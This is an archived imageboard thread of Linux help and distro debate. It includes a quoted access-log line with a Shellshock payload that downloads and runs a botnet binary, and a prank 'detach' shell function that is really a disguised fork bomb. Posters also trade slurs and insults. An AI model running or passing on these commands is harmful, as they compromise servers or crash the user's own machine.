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/flt/ - Friendly GNU plus Linux Thread

This is a blue board which means that it's for everybody (Safe For Work content only). If you see any adult content, please report it.

Thread replies: 322
Thread images: 30

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Previously on: >>52858547

Intended for users of all levels, including absolute beginners.

There are four ways to try Linux, you can:

1) Install a Linux OS on a VM (Virtual Machine/VirtualBox) for "safety purposes"
2) Use the Live ISO directly without installing anything, that way, you can get a "full Linux experience".
3) Dual-boot Linux with Windows/Mac (recommended if you want to learn more about Linux)
4) Go balls deep and overwrite everything with Linux (not recommended)

Before asking, please search for answers to your questions in resources.

Please be civil, notice the "Friendly" in every Friendly Linux Thread.

Understand that much of your software from Windows will be unavailable, although maybe wine can make up for it.

man <insert command here>
your friendly neighborhood search engine
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What is Linux (or GNU/Linux for Stallmanists)?

Various helpful Linux pages from your friends at /g/

Check out this page for any updates on the OP

Beginner tips/guides

A script designed to ease the transition from Windows to Debian
______Distros For Beginners______

>Mint Cinnamon:
For people just switching from Windows, very pretty and excellent first experience. You can usually use software from Ubuntu and Debian.

If you want minimalism or installing Linux in an old computer, or just want something that it works.

______Distros For Servers______

For a very stable and really long time support (like for 10 years), with the plus of adding experience for a Linux job.

Quick and friendly NAS/server.

>Alpine Linux:
Ultra secure Linux server and firewall.

______Distros For Power Users______

>Arch Linux:
For learning more about Linux, having the newest software or for extreme personalization, it has the best wiki to go from intermediate user to pro.

>Parabola GNU/Linux-Libre:
Using only free software to avoid propietary software, removes binary blobs and any obfuscated code. Fully compliant with the Free Software Foundation.

>Qubes OS:
Security exponentially increased, but at a price.

>PupNGo Linux:
For a more minimalistic distro or for really (REALLY) old computers, has an impressive set of software.

>Replicant OS: A replacement for the closed sourced Android, this is meant for your smartphone.

>Metasploitable (and Kioptrix):
Used for penetration testing AS A TARGET. NEVER connect this disto directly to the internet, configure the virtual machine to a bridged connection BEFORE booting it.

Reminder to advanced users (and only advanced users) to try Source Mage. True source-based distribution that can "heal" broken installs, like "magic". And in contrast with Gentoo:
>It is free from obfuscated and pre-configured code
>Uses only free software (as in freedom) in their main package
>Without 3rd party patches, "sensible defaults" or masked packages
>It doesn't need obfuscated python libraries neither, only bash
>Uses clean dependencies as they came from upstream developers, which by the same provides instant updates
inb4 310 OP posts
at this point it would be clever to add a pastebin link into the op
Hi OP, I remember when the friendly linux guides were replaced by "yours".

The guides should be more friendly, that's why the friendly guides should return.
>replaced by "yours"
every single Anon is free to edit the installgentoo wiki!
> Android
> Closed Source

Nigga, what?

linux source code leaked !!!


link: github.com/torvalds
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Beat DE for functionality and ricing? I'd love to be able to set border sizes, colors, min/max/close alignment, panel placement. Would like to have a log in too. Using arch currently.

Can someone explain the "binary blobs" meme?
What about the people who don't want to sing up for a wiki anon?
What about the editorial war https://en.wikipedia.org/wiki/Wikipedia:Edit_warring

Just asking OP.
Try awesome.

-Some nerds, 1991
Too lazy to explain, but you could be running a backdoor or other shit in your machine without knowing, that is in the form of binary blobs. Binary blobs are pieces of codes without the source code available.
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Why are they there, what do they do?
Use a fake name and fake email. Jesus christ.
Isn't awesome just a WM? I tried it before and maybe I didn't get too far into it but I wasn't really satisfied with it.
Yes it is: https://github.com/copycat-killer/awesome-copycats

Also, why you need a login manager?
Just type startx.
Proprietary software run in the background, generally kernel drivers and such. They could be loaded with backdoors and whatnot and we'd never know because we can't observe what they're doing and we can't see the source code.
For convenience sometimes proprietary software is used when there is no free alternative, like flash player, or like wireless drivers, or many other drivers.

With patience free drivers are written, but some people can't just wait and include those blobs instead.
if the developers were paid mad stacks perhaps we already had more driver support now
Well believe me I love the CLI because it makes me feel like a 1337 hacker. The only time I use to use X was when I wanted to consume media. Otherwise for small development and logging I just use the console. But I'm starting a pretty big project soon with a friend and he's new to Linux so I want to have a fresh development center ready for us to work smooth and fast on.
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I want to know why something is happening in Thunar.

When I have the first three options in the image ticked, attached volumes do not automount, do not open an instance of thunar, and don't even show up as volumes on the desktop. The system can see them (lsblk & the panel volume widget confirm that they're attached) and I can mount them (any of the many elegant long ways, crudely running the "udiskie" command, whatever) So: the toggles aren't giving me the expected behavior.

If I turn these toggles off, attached volumes still don't automount, but do now appear as unmounted volumes on the desktop.

I can live with either setup since I don't even want automounting, but I don't understand why these buttons aren't doing what they say they do. Please insight?
Yeap, true
My mouse "escapes" my monitor that i start up steam games on.
I went to play CSGO and Portal, and everytime i move my cursor to the right to turn, it pops off of the game monitor and goes to my non-game monitor.
I used to have 2 xservers(one per monitor).I moved to 2 monitors on one physical device and it still goes this.
I made sure each game is in fullscreen mode.
What do?
you could grow the fuck up and stop playing videogames
>switch to linux
>install cuckware
You are doing it wrong.
>Not knowing what source games are
>not knowing a fucking thing about valve.
If you cant fathom it just shut the fuck up and move along.
So I'd like to install Kubuntu on my Desktop on an dedicated hard disk. The problem is that the grub bootloader won't allow me to install grub on my main SSD. Does anyone know how to circumvent this and allow Kubuntu to take up the whole hard disk, while still having a windows install?
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This level of bullying is why I am concerned about installlgentoo wiki being biased.
I mean to say the installer. Not the bootloader.
Dude, /g/ really hate games.
I see nothing wrong with this. PC's still exist, GOG still exists, etc. Who cares if Gaben thinks consolefags should be giving him money too?
RIght but it isnt a GAME problem.
It is an XORG problem.
So any graphical application that runs through Xorg is now a game?
Better hope we are all posting in lynx
Consolefags deserve the shaftings they get. Fuck console companies and fuck their fans.

Really, fuck gamers in general. They're a cancer on society.
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So I'm ready to install Linux, but what is the BEST Linux? Please, I need to know!
>You are executing a binary that you have bought
>You study the dev kit
>implying you dont have a single binary on your system
>you are buying a product, redistribution is piracy. Do you buy a car and share it with the neighborhood?
>Other people can choose not to give up their own work. Why arent you using HURD?
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None of them are the best linux.
The only linux you can run is one that you create from the ground up, so you know exactly what is in your system.
>cant find problem in sound logic
>lowers to insults
I installed Centos on my laptop because I had used RHEL at work before. But everyone seems to think that's wrong based on packages are old. What does this mean? What packages are old, and why would it be problematic for personal use?
> I should pay money to be denied freedom
> I use binaries I need, ergo I should just go full cuck and never use free software again
> implying the dev kit lets me know everything Steam does
> le piracy meme; if I share my car with the neighbourhood can everybody able to use it simultaneously?
> Yes, but that's no reason to use historic software that doesn't work on any hardware
Another faggot thinking to go full ganoo from windows here.

Is Fedora Cinnamon a good choice?
New features for things like LibreOffice and shit. Really, don't use server distros for desktop when there are better alternatives out there.

Of course, at the end is a matter of personal taste anon, so is up to you.
Stop adding spaces to your quotes.
It's actually alright, anon.
Good choice of DE as well
Fedora Cinnamon is an excellent choice.

> Up-to-date but not autistic bleeding edge
> early-adopter but waits for the software to be stable
> best package manager in the business, second only to Portage
> very stable

Only downside is needing to update every 13 months, but they're got the fedup utility for that.
>I should pay money to be in multiple government owned databases that i have no access to
>Implying every binary you have isnt offered just as a binary, where there is no other alternative
>Literally can check every line of code, checking network stack
>You can use the car and go to different places after each place (not everyone would be using the software you share at the same time anyway)

>I buy the game from gog
>I buy the game DIRECTLY from the developer
>I pay the developer who is offering his game for free.
>same issue happens
>it isnt isolated to steam
>it is an xorg problem
>Can I VPN into a computer while using its display?

I want to have a Raspberry Pi with its HDMI out attached to a TV, and control that with my laptop. I'd like to use the rPi as a HTPC, attach a RAID enclosure to it.

>Also, can I stream multiple videos at a time from an rPi server?

PC <-> VPN <-> Pi
Or do you mean vnc?
There is also X11 forewarding
Thanks m8s, downloading it now.

Got a bad experience with ubuntu when i tried it and Fedora looks updated and stable according to my googling.

Will i have any driver issues with an i7 3770, Gigabyte mobo and a GTX 950?
Ignore Fedorafags. You want Debian Testing + Cinnamon, or Ubuntu MATE/GNOME.
sorry, I'm dumb. VNC or RDP.
Laptop runs Arch.
Didn't want to say anything, but this anon >>52874922
is right, you want to ignore fedora
If both ends are using linux you can use X11 forwarding. Basically you were be able to get a xsession on the pi without being logged in or having it up locally on the pi
Or you can openvnc over and do it normally
anyone using Random Agent Spoofer on firefox??
it's munching too much cpu usage when loading 4chan..
has anybody experienced the same thing??
i'm browsing /g/ with xombrero right now.
Are you changing every request?
is one more efficient than the other?
>without being logged in
that sounds...risky?
Just a heads up, Clementine media player causes Skylake to freeze
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Which do I choose? Use the laptop for schoolwork and some goym's; the only real part of a desktop I use often is a file manager. I'd rather something that's minimal but cutting-edge if possible, so these are the 3 I narrowed it down to.
use xaile, feels like foobar2k.
Change Periodically : No
Random (Desktop) : Yes
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$ dmesg | grep -i civ5
[170892.121777] Civ5XP[28317]: segfault at edc ip 00000000f6c0a6f4 sp 00000000f232f86c error 4 in libGLdispatch.so.0[f6bcb000+7e000]
[170908.621851] Civ5XP[28328]: segfault at edc ip 00000000f6c246f4 sp 00000000f234986c error 4 in libGLdispatch.so.0[f6be5000+7e000]
[274975.656766] Civ5XP[17248]: segfault at edc ip 00000000f6c906f4 sp 00000000f23b586c error 4 in libGLdispatch.so.0[f6c51000+7e000]

why is Civ5 showing up in dmesg?
pls elaborate
Both are viable
>logged in
What i ment ways your pi can just be sitting there with no one logged in and services just going on with its life
You setup a xsession on it and you can remotely login. So it wont be mirroring what is running on it like a vnc,but a direct login to the user you have on it
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gnufag here, stopped using linux about 5 years ago. currently running debian unstable.

does anyone know a recent guide that involves gutting the system of undesirable elements and installing software like openrc, nginx, opensmtpd, etc?

can i apt purge emacs without messing up the system?
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I have a text file containing several links (about thirty) to files hosted on speedyshare dot com. I want to upload this text file via sftp and let my vps download all the files. Is there some kind of jdownloader compatible with ssh and the command line?
just uninstall what you don't need and install what you do?

what are you trying to do? need more background here.
Debian and Ubuntu derivatives offer security and stability to newcomers, a lot of documentation and community to help you, but they are distros that just work.
Is it possible to add another shortcut to a function that already has a shortcut?

I'm using Fedora. One shortcut to bring up the "Activities" screen is to press the Windows button. How can I bring up the "Activities" screen by pressing Ctrl + Esc without getting rid of the Windows button shortcut?

Thanks in advance.
> Debianfags shilling their distro

Ignore anyone who says to use Debian over Fedora; APT is inferior to RPM, Fedora is more stable than Stretch, Debian runs old shit, and they're equally free.
Fedora offers all of that and is actually more secure.
Fedora is distributed by Red Hat, and Red Hat make business with the NSA.

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>willingly becoming RedHat's lab rat by using their beta testing OS
> Distributed by
Sponsored by. If that's the case, we should boycott all Ubuntu derivatives too, because Canonical loads Ubuntu with spyware.

I'd also like a sauce on this alleged business Red Hat does with the NSA.
> lab rat

This meme needs to die.

Yeah, Fedora is upstream RHEL, and yeah, Red Hat sponsors it. There's nothing inherently wrong with that idea. It's not like Red Hat is constantly looking over my shoulder, observing everything I do. It has the same bug-reporting mechanism as everything else, it adopts new technology early, and it works just fine.

A "lab rat" distro would be significantly less stable and significantly more bleeding edge.

> Using a distro that names releases after fucking Toy Story
You want to talk about Cancer?
>Sponsored by
Red Hat telemarketer detected.
Is moebuntu a meme? The website looks pretty normal, but the wiki is in latin for some reason? Am I being bamboozled?
> Sponsorship and Distribution are the same thing

When was the last time a Fedora user came here complaining that they couldn't get in touch with Red Hat to download an ISO?
>The website looks pretty normal
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Red Hat telemarketer confirmed for butthurt.
Everyone now proceed to fuck up the NSA cuck lover.
Install it. You deserve what you get, Weeb.
>dosent understand what bleeding edge means
Ugh dude, stop with your pathetic memespeak
maybe a better question is, how do i view all installed packages without dependencies cluttering the view? and how do i auto-purge every orphaned dependency?

debian unstable from most recent release

Used this script to reinstall Arch Linux



You managed to move your mouse from one x server to another?

Is that even possible? I thought that was a limitation of running dual head.
the mouse can't fit through ethernet cables
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Guess who works for Red Hat anons.
Yes, it is called XForewarding.
You get an xsession on a remote client, and you are able to manage it locally with your kbm
Well, normal for a japanese website.
If you do an edit war I'll ban you personally.
>a price
Qubes is free you idiot.
bump !
If I have Lubuntu 15.10 on an old pc, can I turn it into a server?

I was looking at Ubuntu and it has a server version. I did some research and apparently the only thing different it the packages that it comes with.
Would it be a good idea to turn it into a server?
I'm looking to hosting a local "website" to practice making a website with php/js/etc that could act like a regular website that I could connect from anywhere on the internet.

Any advice is really appreciated
Every time I try out a new distro dual boot it writes a new entry to the boot manager, how do I get rid of them? bootrec /fixmbr didn't work
Use Grub instead of the Windows loader
Do it, nigger.

For website stuff, get a LAMPP stack; there are lots of 'em.
newby question:
how do I use this album art script?
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I am buying a Lenovo Thinkpad L430 (i5) for my computer science course. It has Windows 7 installed, should I keep it or install Linux, and if so what distro (I was thinking Fedora GNOME)?
I can't seem to find a LAMPP, I see a LAMP and XAMPP, but can't really find a LAMPP.

Would LAMPP be installing Perl on top of this
Define bleeding edge, then. To my knowledge it means going with the newest things possible to the point of risking system breakage.

And you can't still a "testing" distribution while using "beta tester" as an argument against using something.

Fehora is community maintained, its developers care about making a good operating system. This is not some "hand red hat your computer and shut up" kind of deal.
I put this part in my ncmpcpp config, but replaced the first part with the path to my music and the last part with a path to the script (and replaced paths in the script to my library)
 execute_on_song_change = "echo $(echo /home/hoeruo/music/$(mpc current -f %file%)|sed 's_\(.*\)/\(.*\)/\(.*\)_\1/\2/_') > /home/hoeruo/current_music" 

but the only thing it is doing is replacing all the text in the script file with a path to whatever song is playing instead of... you know, showing album art with feh...
If reconfiguring windows would be trivial then go for it. Get @ that recreational computing

Mint is the best entry level
> Mint

Mint is a shitty Debian/Ubuntu hybrid with zero percent benefit over any distribution.
I'm running Mint in virtualbox and it's sluggish as fuck. Is this purely because of virtualbox? I just wanted to try it out, but I might as well dualboot if it's gonna run like shit.
Yeah, Virtualbox and LiveUSBs will usually have bad performance compared to an actual installation.
What's the lightest weight distro that uses apt-get. I dont care about difficulty or what ever.
Debian netinstall
you can even leave out the ssh server

This is crazy. Who comes up with this stuff?
It's basically Debian with the same installation procedure as Gentoo.
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sweet this looks good tyty
I have used Linux before currently using Win8.1 on my main rig. But what would be good for programming?
All Linux is good for programming, if you're willing to put in the effort I guess Gentoo, but honestly it's all good.

I use Fedora, I'd recommend it to anyone.
that x60 looks bretty good m8.
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Why can't I access my windows box from my linux machine over the network?
the best linux is only your own distro
debian sid with i3wm
It just states it there in the message
but yeah
how do i download all pictures from rms.sexy?
The fuck is he working on in such remote locations...
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writing mostly nowadays. he stopped at the right time, i think linus will follow very soon.
I can't leave windows without some lightweight and functional equivalent to AutoHotKey. I found alternatives for hotkeys and input automation, but I need also something like AHK's ImageSearch.
Except Sikuli (which is not viable on my oldware), is there any software/library on linux that can tell if some image is present on screen?
He receives many emails everyday. He likes to collect them in a bunch and respond to them when he has a minute to spare. He finds it most productive for him to work that way.
which functionality do you need exactly?
So I've installed some disks in my desktop that I want to use for distrohopping.

What are some good distros that aren't arch?
>Look at my webserver's access.log - - [09/Feb/2016:19:58:21 +1300] "GET / HTTP/1.1" 301 184 "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget -O /tmp/China.Z-oqli\xC0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-oqli\xC0 >> /tmp/Run.sh;echo /tmp/China.Z-oqli\xC0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget -O /tmp/China.Z-oqli\xC0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-oqli\xC0 >> /tmp/Run.sh;echo /tmp/China.Z-oqli\xC0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22"

>Shellshock attempt to get me to join a Chinese botnet
Is there anything I should do to try block these shenanigans, or should I just ignore them?
What's the best Network Manager tool on arch? I'm tired of using wifi-menu, because wpa2-enterprise doesn't work on it. CLI is a +, Automatic connection is mandatory.
funtoo, debian, fedora, opensuse, android_x86, GuixSD, mageia
connman or network-manager
cool, thanks.
Is this image a subimage of what I see on screen? If yes, gimme coordinates.
I wouldn't mind duct typing some command-line with some python, if the result is decently fast.

can you actually post in lynx?

i think i prefer links2 but i haven't figured out if it's possible to post in it yet.
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made this little script
for i in $(curl -sL https://rms.sexy/img/ | sed -En 's/.*href="([^"]+\.(jpg|JPG))".*/https:\/\/rms.sexy\/img\/\1\n/p' | sort -Vu); do printf "%s\n" "$i"; curl -#LO "$i"; done

did I do good?
thanks, I'll keep this in mind but i already used
wget -r -P ~/wget/ -A jpg,jpeg,gif,png,webm,webp,opus,mp3 --level=1 --execute robots=off ‐‐refer=http://google.com --user-agent="Mozilla/5.0 Firefox/4.0.1" https://rms.sexy/img/

most of which is unnecessary
what do you guys think about firejail? is it actually useful for "sandboxing" applications or is it mostly snakeoil?
Just use Qubes.
wicd or netctl.
What's your preferred way to start a program in terminal and then detach and close it?
I sometimes use
zathura file.pdf & exit

or when I forget the & exit
^Z bg exit

(this works only in fish, you'll need detach in other shells afaik)
Sometimes I use ranger to look up the file but
! -d evince %f & exit
freezes ranger and kills evince when I close ranger

Is there a general way? Preferably one that I can map to a key combination?
sound neat, but how does it works with processors that doesn't support iommu? I don't know much about xen.
And anyway how is that different from running xen with my favorite distro?
ranger should have a fork option you can add in your conf where you have your file associations or use directly with the :open_with command
Use nohup to prevent hangups. I have this in my bash_aliases
detach() { nohup "$@" &>/dev/null & }

Though with ranger, things should just work. It uses it's own script, rifle, to open files, which solves the problems you just described. Why don't you use that?
You can configure which programs rifle uses through ~/.config/ranger/rifle.conf.
that's a function, retard
I put both aliases and functions into my bash_aliases file.
Does this make you mad?
Try subshells.
 ( exec "$@" & ) &>/dev/null
Not the same anon, but a little. It should be in .bash or .bashrc, not aliases.
zathura file.pdf </dev/zero &>/dev/null &

After that you can close your terminal. The program will still run.
It's bad form. Use the fucking standards. If you install a program in the future that reads your aliases file, you may ask yourself why it's broke.

Either put everything into ~/.bashrc or put aliases in bash_aliases and functions in bash_functions.
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Please develop.
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>Linux is good.

What the hell did I just install?
Thanks I somehow overlooked the rifle thing in the ranger manual, works nicely with xdg-open

This is all much less convenient than
zathura file.pdf & exit

and also has to be done before the program starts, so I don't really see the point, but thanks anyway
Short snippets like that are basically aliases, the only difference being that the argument is somwhere in the middle, not at the end.
Don't worry, I don't put longer functions in there.
>If you install a program in the future that reads your aliases file, you may ask yourself why it's broke.
That's bad design on the programs side. You should parse $BASH_ALIASES instead.
Besides, is .bash_aliases really a standard? I thought it was just a convenience thing.
>zathura file.pdf & exit
If the program try to read from stdin or wrtie to stdout/stderr it will crash and stop.

</dev/zero &>/dev/null

are here to prevent that.
detatch(){ :(){ exec "$@" </dev/null &>/dev/null & :|: & };:;}
It just works.
shell background fork bomb?
It's Xorg.
Think he meant performance cost. qubes is basically vm everything.
see above. not one, but everything.
So I Installed Gentoo™ and Urxvt is giving me trouble with fonts. I can't get it to use the font I want it to, any ideas?
install gentoo
fc-list | egrep -h ":.*:"
echo "URxvt.font: xft:[put facename here]:size=10 >> ~/.Xresources
forgot the closing " after 10 sry
egrep -h ":.*:"

the fuck are you doing
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>able to install gentoo
>unable to set a fucking font
>unable to read manpages/wiki articles
>able to install gentoo
I've tried this, but urxvt just says it was unable to load base fontset. The font has a space in its name, but that hasn't stopped my other machines.
URxvt.font: -xos4-terminus-medium-r-normal-*-12-120-72-72-c-60-iso10646-1

xft is for faggots
also dont forget to xrdb ~/.Xresources after changing it's contents
I've been doing that, no dice so far.
I'll try that to see if it works.
Why is X using a capital X in it's resources file name? That's not how unix works.
You have no idea about UNIX, then.
Nice argumentation. Try again.
Nope, didn't work. I have it installed, so it's not that.
You could just try it?
fc-list's output is path:Family Name:style so
is the easiest regex to make it human readable
    #!/usr/bin/env bash
printf "$2" | grep -Eo "<$1>[^<]+" | sed -e "s/<$1>//"

artist=`mpc -f '%artist%' current | sed -e "s/\\ /+/g"`
album=`mpc -f '%album%' current | sed -e "s/\\ /+/g"`



mkdir -p "$HOME/.mpdc"

function retrieve()
_ret=$(curl -s "$url$path")

image_extralarge=$(extractxmlvalue 'image size="extralarge"' "$_ret" 2>/dev/null)

[[ "$image_extralarge" != "" ]] && [[ ! -f "$image_dir/$f_image_extralarge" ]] \
&& curl -s "$image_extralarge" -o "$image_dir/$f_image_extralarge"

if [[ $(mpc status | grep "playing" | wc -l ) -gt 0 ]]; then
if [[ ! -f "$image_dir/$f_image_extralarge" ]]; then
feh -xg 200x200+50+50 $image_dir/$f_image_extralarge
Terminus isn't even showing up in xfontsel like the one I'm trying to use. What.
Well, my fc-list command doesnt print a path before the family. That's why it failed for me.
Should i install antergos?
Okay, running "xset +fp /usr/share/fonts/terminus" then "xset fp rehash" let me use terminus. Still experimenting.
Sure, got nothing to lose but 20minutes if you're not enjoying it for some reason.
It's just Arch with a DE and some extra stuff if you select them.
Ok, no idea how or why but my font is working now. Cool?
Install Manjaro if you are a bloody beginner.
Why Manjaro and not Antergos ?
>install grsecurity
>enable all chroot option, especially GRKERNSEC_CHROOT_DOUBLE
>cat /proc/sys/kernel/grsecurity/chroot_deny_chroot return 1; it's active.
>want to test it
>install debian on tes_chroot_dir with debootstrap
>fakechroot fakeroot chroot tes_chroot_dir bash
>compile and run this really simple code for breaking out from chroot found on the first page of google: http://m.oschina.net/blog/113399
>it breaks out like nothing

Am I getting memed?
It's better, looks better, newb friendly, doesn't break, it's broken installergos.
*it's not
Thanks, what do I do with this?
I thought you were just being the typical retarded gentooman but I wanted to give you the benefit of the doubt.
>it's better
Great argument, dickbreath.
>looks better
Subjective and you can rice it yourself, if you're that much of a faggot.
>newb friendly
It's exactly the same.
>doesn't break
In comparison to what ?
save as mpdcover.sh, execute it on song change
it will download the cover if it's not already downloaded to ~/.mpdc/
>not the industrial standard SELinux
Your fault.
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>All I know about Manjaro are /g/ memes
Will it display it? That other script was supposed to display current album art with feh
We do know for sure that its development team is tiny and far less competent than Arch's team. What more do you need ?
>using fake images
nice try faggot
It asks mpd what song is playing and will show the cover via feh, yes.
nice meme

He's trolling you so hard, fuck manjaro just go with Ubuntu if you're a complete beginner.
>go with ubuntu
>sending error reports by default
>sending user statistics to amazon
>I'm not trolling
Thank you! I will try this once I get off work!
>sending error reports by default
>the distro is making an active attempt at working and being bug free
How is telemetry bad ? Especially for something that attempts to "work" without issues for the average user.
Oh, you sure told me.
How about posting an anime picture to go with that ?
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>manjaro shills tried to hack allan's page
telemetry and generally "calls to home" should be opt-in and not active by default without even a way of disabling it at install time
>he has no idea how bug report in open source app works

Go back to desktop threads, you sperg. You are a disgrace to the Linux community as a whole.
Bug reporting is not really an inconvenience and people should stop comparing Win10 telemetry with "we would like to know if it doesn't work".
Yeah, it doesn't work. Developers are just waiting for someone to make a bug report, yet only a tiny number of people actually bother doing so instead of complaining on a random board.
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>I have no arguments for the amazon spying, so let's talk just about the error reports thing, maybe I can win here.
>I have no arguments about the error reports, so let's just talk about amazon spying, maybe I can win here.
Are you retarded ? I didn't say Ubuntu is perfect nor did I make an excuse about the Amazon thing.
Fuck off, you sperg.
wow that is an amazing mix of both the words amazon and ubuntu good job
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fix your font rendering
Nah, it's fine from my perspective. I might try to experiment with Overpass, though.
fail2ban can be used for this.
I want to learn SSH, but no idea where to start. Been using Arch for years now but never needed ssh, but now I've got a roommate and want to ssh into his machine, will this work? He has Win 7.
>thinking chroots are for security
Anyone with a brain knows that you don't chroot and expect it to protect your system.
I use :antialias=false, but my urxvt fonts are still blurry what do?
I know that, but I don't understand why that option doesn't work and allow using chroot into a chroot
>why that option doesn't work
If you have root and have the right programs you can do fucking ANYTHING to a system. There's nothing magic about a chroot. Hell, if you can write to the disk and create executable files you can just fucking echo a program to the disk and do whatever the fuck you want, a C compiler isn't really required. Suppose you're in a chroot as root and can create executable files. You can create (somehow) the mount program, mount devfs, mount the hard drive and you then have unrestricted access to the original filesystem. Chroots are NOT for security.
use bitmap fonts
you are misunderstanding, I never intended to use chroot for security purposes.
I simply patched my kernel with grsec and found out it was also able to restrict certain operation in chroot and was curious about it.
So my question is, why does that feature in not blocking an explicit and simple chroot() call, with no kinds of workaround, when it is exactly what it should be doing? what went wrong?
It looks like you chdir "out" of the chroot, so when you call chroot again, grsec doesn't realize that it's a double chroot and allows it.
well, makes sense. thanks
It's probably a bug in grsec. You really need to go with an OpenBSD system if you want security, Linux isn't focused on it so it's like trying to patch up a beehive, and every time they add new features it gets new vulnerabilities.
use termite
I am using Fedora 23 on my laptop but also need to install Windows 7 for software that can not be run smoothly on WINE.

My Windows 7 USB is ready to go, but how do I successfully boot via USB and install windows on my fedora machine?
Virtual Machine.
Xft.antialias:    true
Xft.autohint: false
Xft.dpi: 96
Xft.hinting: true
Xft.hintstyle: hintslight
Xft.lcdfilter: lcddefault
Xft.rgba: rgb
do you think that a 4gig ram laptop is going to be able to handle running fedora, windows in a virtual machine alongside Autodesk software?

Otherwise I'm wiping fedora and having to go the long way around
> SELinux
> as secure as grsecurity

SELinux is a role-based access control system. It does only a few jobs.

Grsecurity covers a number of gaping security holes in Linux systems. It does substantially more and can be used alongside SELinux.

It is in fact recommended that one use it with SELinux.
Isn't SELinux literally made by the NSA?
In fact, Obama himself coded 90 lines into it.
It was originally made by the NSA but now it's open-source.

It's probably safe. Use grsecurity's RBAC if you're paranoid.
Isn't openBSD NSA tho?
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Reminder to use \e instead of \033, so scripts don't work on OSX.
I like st /simple terminal/ but the blinking box "slips" away when moving it left/right.

>press right/left arrow to go righ/left
>box moves right/left
>release right/left arrow button
>box continues to move right/left

it's the same with backspace/delete

is there a patch or a workaround to correct this?
everything is nsa thanks to systemd
>using a terminal emulator

CTRL+F1-6 newfag
how are you shitposting nigger
CTRL+ALT+F7, how new are you nigger
you can't shitpost from lynx you nigger
>X in F7
what's wrong with it you sperg
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38KB, 638x445px
pls I need some help. I have Debian-testing install and everything was fine, I've been using it for like 3months now, until I encountered a strange problem. I use my computer for web development purposes and rarely watch media stuff like movies etc, today i tried to open a WEBM file and it had no sound and didn't play video contend, it stays paused on the first frame though i can scroll the video forward and see frame contents also no sound. Tried opening in gnome video player/dragon player/mpv, vls plays the video but still no sound. I want you to note that I googled this stange problem, and installed libraries listed there, ffmpeg, libav* etc. Pls help.
l also use awesome wm, if it matters.
Installed elementary os freya on my macbook
>installed basics
>installed tweaks
>installed some icons and color schemes
how do I rice this?
>inb4 read sticky
>inb4 bing
>Debian listed nowhere
shit list
>get an animu wallpaper
>make terminal transparent
>get a gay as ass font
>customize a rainbow ps1
>post screenfetch in retarded desktop thread
there you just riced
Every desktop thread ever.
I'm getting errno 5 when trying to install Mint. Should I just say fuck it and get Ubuntu instead?
your fault
Show me only one desktop from the current desktop thread which shows a transparent terminal and a rainbow PS1 (/v/ posters excluded).
Install from DVD or USB ?
>corrupted iso
>corrupted usb/dvd
>corrupted HD
I assume that probably the iso was corrupted during the download.
Re-download it, install on USB and try again.
It's not the distro's fault.
>(/v/ posters excluded)
Nice cop-out. As if all the other useless fucks in that shitty thread are hard-core gentoomen. Did that offend you as well ?
Anyone knows why X is freezing when I try to download these fonts into my ~/.fonts/ directory?

PCF: unifont-8.0.01.pcf.gz (1 Mbyte)
BDF: unifont-8.0.01.bdf.gz (1 Mbyte)

Not a problem, fonts are saved and I restarted X, but I'm curious what happend here.
>90 lines of code for a fart button
>zero documentation
>GNU Unifont
Not surprised. That font is shit. GNU can't make good fonts.
I did it guys! I installed Debian's minimal iso and it works wonders! This is the first time I install an almost-blank Debian, so what should I do? Already got myself iceweasel and Openbox for the basics.
I checked the MD5sum. My guess is the USB since it's a shitty old one, but it worked fine for Win10. I'm about to try rufus to unpack the iso on the USB instead of pendrive linux
Is there a way to move a cached media file which mpv is playing from the RAM to the HDD?
Best graphical unpacking manager?
>sudo pacman -Syu
>Net Upgrade Size: -0.08 MiB
Feels good mang
Is it possible to either
1. have utf8 support in a tty
2. have a shell script only execute something if it's in (or not in) a tty
xarchiver if gtk2, otherwise file-roller.
Having a dilemma between Manjaro and Chakra, want to try a beginner-intermediate distro with pacman but don't have the time to be bothered with archwiki.
Anyone with something to tip the choice?
Uh. I got Debian, installed it from scratch and so far everything works wonderfuly except for one thing: Openbox's mouse seems slightly laggy. But not so laggy it's easy to see it, but still laggy. I'm autistic, so this small ammount of lag on my mouse movement is maing me go nuts.

Also, I installed gedit to test something and it's awfuly laggy and slow. It also has this gigantic black border around it and when I move it it moves super slowly.
>utf8 support in a tty
locale.conf is set to UTF8. vconsole.conf doesn't exist.
>AMD's fglrx driver does not work with the current kernel (1493888).
It is warmly recommended to uninstall the fglrx driver before upgrading to
Ubuntu 15.10.
The open source "radeon" driver can be used as a temporary replacement
until a fix is available.
has this been fixed yet? I cant boot into ubuntu with two screens connected at all...
>doesn't break,
LMFAO, I have been in their support chat room before, keep dreaming
My friend is trying to install xubuntu, but it hangs when loading booting the livecd. Tried both with UEFI and BIOS, always hangs when loading, even before reaching the desktop. What could it be?
Anyone good with wine reg-editing?

I want to set up a prefix for exclusive use of jap things. I'm trying to find a way to set the locale internally by using the registry related to that prefix instead of passing to wine LC_ALL=ja_JP.UTF-8 everytime.

Thing is, I tried everything, but nothing works:

>changing LC_* and Locale to e0010411 in HKEY_CURRENT_USER/International

it just ignores it, it seems to prefer whatever is passed through the original shell environment first.
how to exclude 'simple terminal' from compton shadow and/or opacity?
Why isnt this doing anything?
for file in $*
ffmpeg -i "$file" -c:a copy -o ./"$file"
What do you want to do?

And by the way don't use $*. But use "$@" (yes surrounded by double quotes).
replace $* with * and your script should work fine
You're trolling too hard anon.
I want to apply a ffmpeg command to all files currently in the folder that the script is executed from.

It executes now but it is simply overwriting its self.
Where would i work in a if/then check on a folder existing
find . -mindepth 1 -maxdepth 1 -type f -exec ffmpeg [options] {} \;
How is it getting a filename?
It runs but errors out with no such file or directory
Do you know what cached means?
{} is replaced by filename
I think i have it but im stuck on making a new folder if it dosent exist for the files to be output too. if incase i have to run the script a second time in that folder
It is throwing errors on finding the "done" folder

if [ ! -d "$done" ]; then
mkdir done
for file in *
ffmpeg -i "$file" -c:a copy -o ./done/"$file"
